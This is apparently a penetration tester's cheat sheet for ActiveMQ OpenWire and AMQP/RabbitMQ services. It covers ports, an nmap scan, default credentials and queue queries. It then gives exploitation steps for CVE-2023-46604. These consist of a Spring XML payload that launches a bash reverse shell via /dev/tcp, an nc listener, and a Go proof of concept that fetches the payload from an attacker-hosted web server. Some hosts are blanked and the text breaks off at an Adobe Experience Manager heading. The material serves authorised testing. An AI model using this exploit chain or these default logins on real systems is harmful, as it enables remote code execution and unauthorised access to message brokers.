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ActiveMQ OpenWire Transport Pentest


#Commonly Observed on 
Ports - 32064, 32357, 61616l 

you will find it together with RMI (1099 Port) & a webserver (6161 - jetty)
Nmap Scan 

nmap -sV -Pn -n -T4 --script amqp-info -p 61616
Web server -- -> default creds- admin:admin

#Query the server 
curl -d 'body="Hello World"' "" 

curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue

Connecting to ActiveMQ (Might require creds)

#Download activemq from here
unzip filename

go to conf/activemq-cli.config --> and update the IP Address

broker {
        local {
            amqurl = "tcp://"
                jmxurl = "service:jmx:rmi:///jndi/rmi://"
                username = ""
                password = ""
                prompt-color = "light-blue" // Possible values: "gray", "red", "light-red", "light-green", "green", "light-yellow", "yellow", "light-blue", "blue", "light-purple", "purple", "$

> connect --broker local
> send-message --body local --queue SendQueue
> queues
> list-messages -queue SendQueue

ActiveMQ Exploit - CVE-2023-46604 

git clone

#Update poc-linux.xml as below 
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns=""
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <!-- The command below downloads the file and saves it as test.elf -->
            <value>bash -i &#x3E;&#x26; /dev/tcp/ 0&#x3E;&#x26;1</value>

#Start a python web server 
python3 -m http.server 8001

#Start nc, get you rev shell here
nc -nvlp 9001

#Run the exploit 
go run main.go -i Target_ServerIP -u http://Attacher_host:8001/poc-linux.xml 

AMQP/ ActiveMQ  - 5671, 5672/tcp

Rabbitmq uses these ports - More Info Here

git clone 
pip3 install . 
python3 install 

cottontail/bin/cottontail -h

python3 cottontail --username guest --password guest -v
AEM - Adobe Experience Manager 


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